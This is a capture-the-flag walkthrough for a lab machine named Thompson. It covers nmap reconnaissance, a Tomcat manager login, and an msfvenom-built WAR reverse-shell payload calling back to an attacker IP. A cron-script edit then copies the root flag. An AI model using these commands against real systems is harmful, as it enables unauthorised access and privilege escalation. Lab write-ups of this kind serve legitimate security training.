Thompson

Reconnaissance

Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (-Pn)

nmap -Pn 10.10.196.112

Detailed Nmap Scan :

Command Breakdown:

• (-sV): Service version

• (-sC): Default nmap scripts

• (-p): Specifying ports 22,8009,8080

• (-oN nmap): Saving it into a file called nmap

nmap -sV -sC -p 22,8009,8080 -oN nmap 10.10.196.112

Enumeration

Lets visit the site on port 8080

Its a Apache Tomcat page, there is a Manager App tab, lets click it and see what it says

We need a username and a password, we do not have one, so lets click cancel, once we do , we get this page.

We have a username and a password, lets use these credentials to login

We are logged in. Looking through application manager, we see something interesting

We can upload WAR files, now we can make a war file payload that will give us a reverse shell on the machine.

Exploitation

Lets first make the payload, make sure to replace my IP with yours

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.13.8.64 LPORT=1234 -f war > reverse.war

Lets upload the file, click on browse and select the file

And hit deploy, now you should see the file

Now lets start a netcat listener

Now click on the file and you should get a reverse shell

Lets stabilize the shell with these commands

python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
reset
Ctrl + z

We can read the user.txt file

We have two other files in the directory, lets look at what they contain

It looks like the id.sh file is running the id command and sending the output to the file called test.txt. Lets check the cronjobs running on this machine

Looks like it is reading the files in /home/jack, so lets transfer the root flag to this directory by adding the command in the id.sh file and then read it.

We can edit the file using nano or we can use this command

echo "cp /root/root.txt /home/jack/root.txt" >> id.sh

Once we do this, we should see the root.txt file in our directory and we can read it.